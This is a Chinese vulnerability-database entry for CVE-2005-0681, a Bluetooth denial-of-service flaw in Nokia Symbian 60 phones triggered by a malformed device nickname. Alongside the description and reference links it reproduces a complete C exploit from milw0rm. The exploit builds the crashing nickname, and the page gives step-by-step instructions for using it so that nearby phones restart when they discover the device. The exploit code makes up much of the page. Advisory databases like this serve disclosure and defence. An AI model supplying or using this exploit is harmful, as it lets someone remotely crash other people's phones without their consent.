Nokia Symbian 60 拒绝服务漏洞

Nokia Symbian 60 拒绝服务漏洞

漏洞ID 1109088 漏洞类型 其他
发布时间 2005-09-23 更新时间 2005-10-20
图片[1]-Nokia Symbian 60 拒绝服务漏洞-安全小百科CVE编号 CVE-2005-0681
图片[2]-Nokia Symbian 60 拒绝服务漏洞-安全小百科CNNVD-ID CNNVD-200503-052
漏洞平台 Hardware CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/856
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200503-052
|漏洞详情
Nokia是世界上最大的手机生产商,Symbia60是某些Nokia手机搭载的操作系统。Symbian60操作系统存在远程拒绝服务漏洞,攻击者可以利用此漏洞使受害的手机重启。起因是操作系统不能处理畸形的网络数据。在使用蓝牙设备时,如果用户的昵称为16进制”090a”的话,就可能导致其他搜索到该设备用户的Nokia手机重启。导致重启的昵称如下:[任意内容][16进制的090a][任意内容]必须在090a前添加任意内容,因为nokia手机以为090a是末尾的空间,会将其删除。
|漏洞EXP
/*
      Nokia Bluetab Exploit 
      Found & coded by Qnix
 
 - This Exploit will creat file called bluetab.txt with your 
   bluetooth nickname, send the file to your nokia mobile
   open it copy the nickname and paste it to your bluetooth
   nickname, if any one search and find your nickname his
   mobile will restart .
 - this exploit work on many other symbian and java mobiles .

   Qnix - [email protected]

*/

#include <stdio.h>
#define  tab1 0x09
#define  tab2 0x2E
#define  dot1 0x0A

int main(int argc,char *argv[])
{

 FILE *bluetab;

 if(argc < 2)
 { 
   msgm();
   printf("Useage : ./bluetab <nickname>n");
   return 0;
 } 
 else
 { 
   msgm();
   printf("bluetab.txt file created with your nickname . n");
 }
 
 bluetab = fopen("bluetab.txt","w");
 if(!bluetab)
 {
   msgm();  
   printf("Some kind of file error!n");
   return 0;
 }

 
 fprintf(bluetab,"%s%c%c%c",argv[1],tab1,tab2,dot1); 
 fclose(bluetab);
 return 0;
 
}

msgm()
{

  printf(" ------------------------------- n");
  printf("     Nokia Bluetab Exploit       n");
  printf("       found & coded by          n");
  printf("       [email protected]          n");
  printf(" ------------------------------- nn");
}

/* v1 2005-03-04 milw0rm.com */

// milw0rm.com [2005-09-23]
|参考资料

来源:SECTRACK
名称:1013380
链接:http://securitytracker.com/id?1013380
来源:XF
名称:nokia-symbian-dos(19594)
链接:http://xforce.iss.net/xforce/xfdb/19594
来源:BID
名称:12743
链接:http://www.securityfocus.com/bid/12743
来源:MISC
链接:http://www.securiteam.com/securitynews/5PP0V00G1S.html
来源:OSVDB
名称:14574
链接:http://www.osvdb.org/14574

相关推荐: SCT Campus Pipeline 1.0/2.x/3.x – ‘Render.UserLayoutRootNode.uP’ Cross-Site Scripting

SCT Campus Pipeline 1.0/2.x/3.x – ‘Render.UserLayoutRootNode.uP’ Cross-Site Scripting 漏洞ID 1054715 漏洞类型 发布时间 2004-10-13 更新时间 2004-…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享